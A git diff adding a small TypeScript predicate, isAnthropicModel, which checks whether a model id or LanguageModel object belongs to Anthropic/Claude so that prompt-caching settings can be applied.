b/lib/agent/contextManagement/isAnthropicModel.ts new file mode 100644 index 000000000..b2442785b --- /dev/null +++ b/lib/agent/contextManagement/isAnthropicModel.ts @@ -0,0 +1,26 @@ +import type { LanguageModel } from "ai"; + +/** + * Predicate: is this a Claude / Anthropic model? Drives whether to + * attach `cacheControl: { type: "ephemeral" }` to messages + tools + * (Anthropic prompt caching) or leave them untouched. + * + * Byte-for-byte port of open-agents' `isAnthropicModel` + * (`packages/agent/context-management/cache-control.ts`). + * + * Accepts both string model ids (e.g. `"anthropic/claude-haiku-4.5"`) + * and `LanguageModel` instances (e.g. the value returned from + * `gateway("anthropic/claude-...")`, which carries `provider` and + * `modelId` properties).
+ */ +export function isAnthropicModel(model: LanguageModel): boolean { + if (typeof model === "string") { + return model.includes("anthropic") || model.includes("claude"); + } + return ( + model.provider === "anthropic" || + model.provider.includes("anthropic") || + model.modelId.includes("anthropic") || + model.modelId.includes("claude") + ); +}